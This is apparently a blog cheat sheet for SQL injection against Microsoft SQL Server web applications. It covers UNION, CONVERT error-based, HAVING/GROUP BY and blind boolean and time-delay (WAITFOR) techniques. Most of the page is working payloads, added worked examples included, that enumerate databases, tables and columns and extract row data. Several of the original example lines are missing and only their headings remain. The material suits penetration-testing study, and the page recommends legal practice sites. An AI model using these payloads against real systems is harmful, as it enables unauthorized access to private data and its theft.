MSSQL Practical Injection Cheat Sheet

Following on from my MySQL Injection Practical Cheat Sheet here is the MSSQL version.
As before, I will list the injections by their categories: union based, error based and inferential (time and boolean). Wherever you see @@version below (used to find the database version), you can replace it with:
db_name() – to extract the name of the current database
user_name() or user (written without parentheses) – to extract the database user the query runs as; system_user gives the login name
@@servername – to extract the name of the SQL Server instance
host_name() – to extract the name of the connecting host, which for an injected query is the web server rather than the database server
Note that in the examples below I am injecting into an integer field, for example products.asp?id=1<injection here>. As it's an integer field I don't need a single quote to close off the existing value (this is usually the case for integer fields); if you're injecting into a string field, be sure to close the string with a quote first, and let the trailing -- comment out the application's own closing quote.
UNION
UNION is used to append our own query onto the end of the valid query issued by the web application. Find the number of columns first, either with ORDER BY n (it errors as soon as n exceeds the column count) or with UNION SELECT and NULL values (NULL is compatible with every column type, so it never causes a type clash). Assuming there are three columns:
Extract database version:
Extract database names (change N to a number starting from 1):
Extract table names:
Extract column names (replace table1):
1 UNION SELECT NULL,column_name,NULL FROM information_schema.COLUMNS-- will extract all columns (regardless of table)
Extract data (change column1 and table1):
Extract table names from another database (replace other_database with database name)
Extract column names from another database (replace other_database and other_table):
Extract data from another database (replace other_database, other_table and other_column):
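The whole UNION walk in one place, added here as an example rather than taken from the original post or its sources. It assumes the three-column integer injection point from the introduction and a hypothetical application query of the form SELECT name, description, price FROM products WHERE id = 1; table1, column1, column2, id and the other_* names are placeholders.

```sql
-- Added example (not from the original post): a complete UNION walk against
-- products.asp?id=1<payload>. Assumed application query (hypothetical):
--   SELECT name, description, price FROM products WHERE id = 1
-- table1, column1, column2, id and other_* are placeholders.

-- 1. Count the columns: ORDER BY n fails as soon as n exceeds the column count.
1 ORDER BY 3--            -- page renders normally
1 ORDER BY 4--            -- error, so the query returns three columns

-- 2. NULL fits every column type, so it is safe in every slot; then put a string
--    into one slot at a time to find the column the page actually prints.
1 UNION SELECT NULL,NULL,NULL--
1 UNION SELECT NULL,'marker',NULL--   -- 'marker' shows on the page: slot 2 is visible
--    (a string forced into an int column fails with "Conversion failed when
--     converting the varchar value 'marker' to data type int", which is the
--     error-based route used further down the page)

-- 3. Server and database identity; swap in db_name(), system_user, @@servername.
1 UNION SELECT NULL,@@version,NULL--
1 UNION SELECT NULL,db_name(),NULL--

-- 4. Database names: all at once, or one at a time by ordinal (N starts at 1).
1 UNION SELECT NULL,name,NULL FROM master..sysdatabases--
1 UNION SELECT NULL,db_name(N),NULL--

-- 5. User tables in the current database, then the columns of one table.
--    (On a case-sensitive server collation write INFORMATION_SCHEMA.TABLES.)
1 UNION SELECT NULL,table_name,NULL FROM information_schema.TABLES WHERE table_type='BASE TABLE'--
1 UNION SELECT NULL,column_name,NULL FROM information_schema.COLUMNS WHERE table_name='table1'--
1 UNION SELECT NULL,table_name+'.'+column_name,NULL FROM information_schema.COLUMNS--   -- every column, with its table

-- 6. Data. Concatenating columns pulls several through the one visible slot;
--    CAST non-string columns first or the + fails with a conversion error.
--    Remember + is %2b when typed into a URL.
1 UNION SELECT NULL,column1+'|'+column2,NULL FROM table1--
1 UNION SELECT NULL,CAST(id AS varchar(10))+'|'+column1,NULL FROM table1--

-- 7. Other databases need three-part names (database.schema.object; an empty
--    schema means the default schema, normally dbo).
1 UNION SELECT NULL,table_name,NULL FROM other_database.information_schema.TABLES--
1 UNION SELECT NULL,column_name,NULL FROM other_database.information_schema.COLUMNS WHERE table_name='other_table'--
1 UNION SELECT NULL,other_column,NULL FROM other_database..other_table--
1 UNION SELECT NULL,other_column,NULL FROM other_database.dbo.other_table--
```

Every UNION row comes back as an extra row of the page's result set, so steps 4 to 7 return the full list in a single request; the per-ordinal db_name(N) form is only needed when the page renders one row.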
Error Based
CONVERT
This technique is very similar to the MySQL double query error based injection (discussed in my previous post) in that an error is forced; here a valid subquery is evaluated first and CONVERT then fails to turn its string result into an integer, so the result ends up in the error message (Conversion failed when converting the nvarchar value '...' to data type int). In the examples below, be sure to encode + as %2b if typing directly into the address bar. There are two ways of performing this attack, the first listed below being the quicker.
Method 1 – Quicker
Extract database version:
1 AND 1=CONVERT(INT,@@version)--
Extract number of databases:
Extract database names (replace N with a number starting from 1):
Extract table count:
Extract table names (replace N with a number starting from 1):
To extract column names (replace table1 with appropriate table name):
To extract data, first count the entries in the table (replace table1 with appropriate table name):
Then, assuming the columns we wish to extract from are called column1 and column2:
The second top 1 should be incremented to extract subsequent rows:
Extract tables from another database (change other_database and increase N):
Extract columns from another database (change other_database, other_table and increase N):
See how many data entries there are in another database (change other_database and other_table):
Extract data from another database (change other_database, other_table, other_column and increase N):
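Method 1 worked through end to end, added here as an example (not the original post's payloads or those of its sources). It assumes the page's integer injection point; N is the 1-based ordinal you increment between requests, and table1, column1, column2 and the other_* names are placeholders.

```sql
-- Added example (not from the original post): CONVERT error-based enumeration
-- by ordinal, against products.asp?id=1<payload>. N is the ordinal you increment;
-- table1, column1, column2 and other_* are placeholders. Type + as %2b in a URL.

-- Why it works: CONVERT(INT, <string>) raises
--   Conversion failed when converting the nvarchar value '<string>' to data type int.
-- and the error message carries the string. Two things silently defeat it:
--   a value that happens to be numeric converts cleanly (no error), and a subquery
--   that returns no row yields NULL (no error either). Prefixing a marker such as
--   '~' guarantees the conversion fails, and a missing marker means you ran off
--   the end of the set.

-- Version, then counts (COUNT is an int, so it must be cast and prefixed).
1 AND 1=CONVERT(INT,@@version)--
1 AND 1=CONVERT(INT,'~'+CAST((SELECT COUNT(*) FROM master..sysdatabases) AS varchar(10)))--
1 AND 1=CONVERT(INT,'~'+CAST((SELECT COUNT(*) FROM information_schema.TABLES WHERE table_type='BASE TABLE') AS varchar(10)))--

-- The Nth row of any set: take the first N in ascending order, then the last of those.
-- Database N:
1 AND 1=CONVERT(INT,'~'+(SELECT TOP 1 name FROM (SELECT TOP N name FROM master..sysdatabases ORDER BY name) AS t ORDER BY name DESC))--
-- Table N:
1 AND 1=CONVERT(INT,'~'+(SELECT TOP 1 table_name FROM (SELECT TOP N table_name FROM information_schema.TABLES WHERE table_type='BASE TABLE' ORDER BY table_name) AS t ORDER BY table_name DESC))--
-- Column N of table1, in the table's real column order:
1 AND 1=CONVERT(INT,'~'+(SELECT TOP 1 column_name FROM (SELECT TOP N column_name,ordinal_position FROM information_schema.COLUMNS WHERE table_name='table1' ORDER BY ordinal_position) AS t ORDER BY ordinal_position DESC))--

-- Rows: count them, then row N with two columns joined (CAST any non-string column).
1 AND 1=CONVERT(INT,'~'+CAST((SELECT COUNT(*) FROM table1) AS varchar(10)))--
1 AND 1=CONVERT(INT,'~'+(SELECT TOP 1 column1+'|'+column2 FROM (SELECT TOP N column1,column2 FROM table1 ORDER BY column1) AS t ORDER BY column1 DESC))--

-- Another database: the same shapes with three-part names.
1 AND 1=CONVERT(INT,'~'+CAST((SELECT COUNT(*) FROM other_database..other_table) AS varchar(10)))--
1 AND 1=CONVERT(INT,'~'+(SELECT TOP 1 table_name FROM (SELECT TOP N table_name FROM other_database.information_schema.TABLES ORDER BY table_name) AS t ORDER BY table_name DESC))--
1 AND 1=CONVERT(INT,'~'+(SELECT TOP 1 other_column FROM (SELECT TOP N other_column FROM other_database..other_table ORDER BY other_column) AS t ORDER BY other_column DESC))--
```

The inner ORDER BY is what makes "the Nth row" mean the same row on every request; the outer DESC simply picks the last of the first N. Increment N until the marker stops appearing in the error.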
Method 2 – Slower
Extract database names (replace N with a number starting from 1):
1 AND 1=CONVERT(INT,db_name(N))--
Extract first table name:
As this extracted the first table's name (called table1 here), we add that to the query to enumerate the next table, like so:
Further tables can then be enumerated by adding table names to the query. The following query would extract the third table name:
Columns are then enumerated in the same manner as before (replace table1):
1 AND 1=CONVERT(INT,(SELECT top 1 column_name FROM information_schema.COLUMNS WHERE TABLE_NAME='table1'))--
Extract data (replace column1 and table1):
1 AND 1=CONVERT(INT,(SELECT top 1 column1 FROM table1))--
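The Method 2 walk spelled out, added as an example (it is not the original post's payload list). It assumes the same integer injection point; table1, table2, column1, field1 and id are placeholders standing for values recovered in earlier steps.

```sql
-- Added example (not from the original post): the slower CONVERT walk, which
-- excludes what it has already seen instead of addressing rows by ordinal.
-- Injection point products.asp?id=1<payload>; table1, table2, column1, field1
-- and id are placeholders for values recovered earlier. Type + as %2b in a URL.

-- Databases by ordinal: db_name(N) returns NULL past the last one, which
-- converts without error, so "no error" means "no more databases".
1 AND 1=CONVERT(INT,db_name(N))--

-- Tables: each recovered name goes into NOT IN. Because every seen row is
-- excluded, the order in which TOP 1 picks rows does not matter here; the walk
-- ends when the subquery returns NULL and the error disappears.
1 AND 1=CONVERT(INT,(SELECT TOP 1 table_name FROM information_schema.TABLES WHERE table_type='BASE TABLE'))--
1 AND 1=CONVERT(INT,(SELECT TOP 1 table_name FROM information_schema.TABLES WHERE table_type='BASE TABLE' AND table_name NOT IN ('table1')))--
1 AND 1=CONVERT(INT,(SELECT TOP 1 table_name FROM information_schema.TABLES WHERE table_type='BASE TABLE' AND table_name NOT IN ('table1','table2')))--

-- Columns of table1, the same way.
1 AND 1=CONVERT(INT,(SELECT TOP 1 column_name FROM information_schema.COLUMNS WHERE table_name='table1'))--
1 AND 1=CONVERT(INT,(SELECT TOP 1 column_name FROM information_schema.COLUMNS WHERE table_name='table1' AND column_name NOT IN ('column1')))--

-- Rows of column1. Data values are not unique the way names are, so NOT IN on
-- the value itself skips duplicates; walk a unique key and pull the value with it.
1 AND 1=CONVERT(INT,(SELECT TOP 1 column1 FROM table1))--
1 AND 1=CONVERT(INT,(SELECT TOP 1 column1 FROM table1 WHERE column1 NOT IN ('field1')))--
1 AND 1=CONVERT(INT,'~'+(SELECT TOP 1 CAST(id AS varchar(10))+'|'+column1 FROM table1 WHERE id NOT IN (1,2)))--

-- A value that looks numeric converts cleanly and is missed; the '~'+ prefix
-- on the last line forces the conversion to fail for every row.
```

The NOT IN list grows by one name per request, which is why the page calls this the slower method; it does have the advantage of needing no ORDER BY to be correct.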
HAVING and GROUP BY
Some basic enumeration of the columns the vulnerable query itself selects can be performed by forcing errors through the use of HAVING and GROUP BY.
This reveals the table and the first column of the query's select list in table_name.column_name format.
The second column name can be enumerated with:
The second column name can then be added to the query to reveal the third column name:
If the page no longer errors when adding columns, there are no select-list columns left to enumerate. Note that this only reveals columns the vulnerable query selects, not every column in the table; use information_schema.COLUMNS for the rest.
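A worked run of the HAVING / GROUP BY walk, added as an example rather than taken from the original post. It assumes a hypothetical application query SELECT id, name, price FROM products WHERE id = 1 behind products.asp?id=1; the error text shown is SQL Server's standard message for an ungrouped select-list column.

```sql
-- Added example (not from the original post): HAVING / GROUP BY enumeration of
-- the vulnerable query's own select list. Assumed application query (hypothetical):
--   SELECT id, name, price FROM products WHERE id = 1
-- Each payload is appended after the 1 in products.asp?id=1.

-- HAVING turns the statement into an aggregate query, so every ungrouped column
-- in the select list is now an error, and SQL Server names the first one.
1 HAVING 1=1--
--   Msg 8120: Column 'products.id' is invalid in the select list because it is
--   not contained in either an aggregate function or the GROUP BY clause.

-- Group by the column just revealed and the next one is named.
1 GROUP BY products.id HAVING 1=1--
--   ... Column 'products.name' is invalid in the select list ...
1 GROUP BY products.id,products.name HAVING 1=1--
--   ... Column 'products.price' is invalid in the select list ...
1 GROUP BY products.id,products.name,products.price HAVING 1=1--
--   no error: the select list is exhausted. Columns the query never selects are
--   not revealed by this; use information_schema.COLUMNS for those.

-- If the query aliases its table (FROM products p), the error reports p.id and
-- the GROUP BY must use the alias as well.
```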
Inferential
When no data or error messages are returned, inferential injections (aka blind injections) can be used to 'infer' database information from time based or boolean responses. The SUBSTRING function breaks the query result into single characters, which are enumerated one at a time: ASCII converts each character to its decimal code, which is then compared against a guessed code (an ASCII chart gives the ranges: 48–57 for digits, 65–90 for upper case, 97–122 for lower case). The LOWER function is also used so that we only have to deal with lower case characters (up until the point of actual data retrieval, where case matters).
In the case of time delay injections we are effectively asking the database: "if the first character of the database user's name is s, wait 15 seconds before returning the page". If it is not, the page returns immediately. In the case of boolean injections, the expected page is returned if the condition evaluates to true and a different page (or no result) if it evaluates to false. Comparing with > rather than = lets you binary search the character's code, which takes about seven requests per character over the printable range instead of up to ninety-five.
When making inferential injections, it's often useful to determine first how many characters are in the piece of data you're trying to extract, so you know when to stop. In MSSQL this is done by wrapping the value in LEN() (which ignores trailing spaces). When walking rows with TOP 1 ... WHERE name > 'previous', add an ORDER BY on the same column: without it SQL Server may return any qualifying row, and the walk skips entries.
Boolean
Extract version length:
Extract first character of version:
By increasing the SUBSTRING start argument, you can extract the second character in the version, like so:
Extract databases (replace N):
Extract 1st table:
Extract 2nd table (replace table1 with the first table’s name):
Extract 3rd table (replace table2 with the second table’s name):
Extract 1st column (replace table1):
Extract 2nd column (replace table1 and column1):
Extract 1st field of column1 (replace column1 and table1):
Extract 1st field of column2 (replace column1 and table1):
Extract 2nd field of column1 (replace column1,table1 and field1):
1 AND ASCII(SUBSTRING((SELECT TOP 1 column1 FROM table1 WHERE column1 >'field1' ORDER BY column1),1,1))>65--
Extract table 1 from another database (replace other_database)
Extract 1st column from another database (replace other_database and other_table):
1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 column_name FROM other_database.information_schema.COLUMNS WHERE TABLE_NAME='other_table'),1,1)))>97--
Extract data from another database (replace other_database, other_table and other_column):
Time
Time based MSSQL injections use the WAITFOR DELAY statement to produce an attacker-specified delay before the page loads if the condition evaluates to true. Because WAITFOR is a statement rather than an expression, the examples below stack it as a second statement after a semicolon, which requires the application's database driver to allow batched queries.
Extract version:
1; IF LEN(@@version)>5 WAITFOR DELAY '00:00:15'--
Extract DB Name (replace N):
Extract 1st table:
Extract 2nd table (replace table1):
1; IF ASCII(LOWER(SUBSTRING((SELECT TOP 1 NAME FROM sysobjects WHERE xtype='U' AND name>'table1' ORDER BY name),1,1)))>97 WAITFOR DELAY '00:00:15'--
Extract 3rd table (replace table2):
1; IF ASCII(LOWER(SUBSTRING((SELECT TOP 1 NAME FROM sysobjects WHERE xtype='U' AND name>'table2' ORDER BY name),1,1)))>97 WAITFOR DELAY '00:00:15'--
To extract 1st column (replace table1):
To extract 2nd column (replace table1 and column1):
Extract 1st field of column 1 (replace table1 and column1):
Extract 1st field of column 2 (replace table1 and column1):
Extract 2nd field of column 1 (replace column1,table1 and field1):
1; IF ASCII(SUBSTRING((SELECT TOP 1 column1 FROM table1 WHERE column1 >'field1' ORDER BY column1),1,1))>65 WAITFOR DELAY '00:00:15'--
Extract 1st table from another database (replace other_database):
Extract 1st column from another database (replace other_database and other_table):
Extract 1st field of column 1 from another database (replace other_database, other_table and other_column):
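One full blind walk, boolean and time-based side by side, added here as an example for both the Boolean and Time sections above (it is not the original post's payload list). It assumes the page's integer injection point; the true/false and delay/no-delay answers shown are constructed for a current database whose name happens to start with 'i', and table1, column1, field1 and the other_* names are placeholders.

```sql
-- Added example (not from the original post): a blind walk against
-- products.asp?id=1<payload>, boolean and time-based forms of each probe.
-- The responses noted are constructed for a database whose name starts with
-- 'i'; table1, column1, field1 and other_* are placeholders.

-- 1. Length first, so the per-character loop knows when to stop
--    (LEN ignores trailing spaces; use DATALENGTH if that matters).
1 AND LEN(db_name())>8--                                  -- boolean: true page / false page
1; IF LEN(db_name())>8 WAITFOR DELAY '00:00:05'--         -- time: delayed / not delayed

-- 2. One character by binary search. LOWER folds letters into 97..122, so at
--    most five probes settle a letter (constructed answers for 'i' = 105):
1 AND ASCII(LOWER(SUBSTRING(db_name(),1,1)))>109--   -- false: 97..109
1 AND ASCII(LOWER(SUBSTRING(db_name(),1,1)))>103--   -- true:  104..109
1 AND ASCII(LOWER(SUBSTRING(db_name(),1,1)))>106--   -- false: 104..106
1 AND ASCII(LOWER(SUBSTRING(db_name(),1,1)))>104--   -- true:  105..106
1 AND ASCII(LOWER(SUBSTRING(db_name(),1,1)))=105--   -- true:  'i'
1 AND ASCII(LOWER(SUBSTRING(db_name(),2,1)))>109--   -- advance SUBSTRING's start for the next character

-- 3. The same probe as a stacked time-based query. The ; starts a second
--    statement, so the driver must accept batches; the original WHERE id=1
--    still renders normally and only the response time changes.
1; IF ASCII(LOWER(SUBSTRING(db_name(),1,1)))>109 WAITFOR DELAY '00:00:05'--

-- 4. Walking rows with >: ORDER BY is what makes TOP 1 return the *next* value;
--    without it any row above field1 may come back and the walk skips entries.
1 AND ASCII(SUBSTRING((SELECT TOP 1 column1 FROM table1 ORDER BY column1),1,1))>77--
1 AND ASCII(SUBSTRING((SELECT TOP 1 column1 FROM table1 WHERE column1>'field1' ORDER BY column1),1,1))>77--
--    Real data is mixed case: drop LOWER and search 32..126 (printable ASCII).

-- 5. Running off the end: the subquery returns NULL, ASCII(NULL)>77 is not true,
--    and you get the false page (or no delay) for every probe. Past the last
--    character of a string the > probes are false as well, hence step 1.

-- 6. Other databases use three-part names; time-based form shown.
1; IF ASCII(LOWER(SUBSTRING((SELECT TOP 1 table_name FROM other_database.information_schema.TABLES ORDER BY table_name),1,1)))>109 WAITFOR DELAY '00:00:05'--
1; IF ASCII(SUBSTRING((SELECT TOP 1 other_column FROM other_database..other_table ORDER BY other_column),1,1))>77 WAITFOR DELAY '00:00:05'--
```

The 5 second delay is a placeholder (the page's payloads use 15): choose something comfortably above the normal variation in the application's response time, and repeat any probe whose timing is ambiguous rather than trusting a single measurement.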
Sources Used
The above information was taken from a variety of sources, including:
Kaotic Creation’s article on blind SQL injections
Kaotic Creation’s article on CONVERT error based injections
Pentest Monkey’s MSSQL injection cheat sheet
CWH Underground’s ‘Full MSSQL Injection PWNage’ paper
Some other resources I recommend are:
Acuforum – an online vulnerable web app hosted by Acunetix
SQLZoo – a great online test bed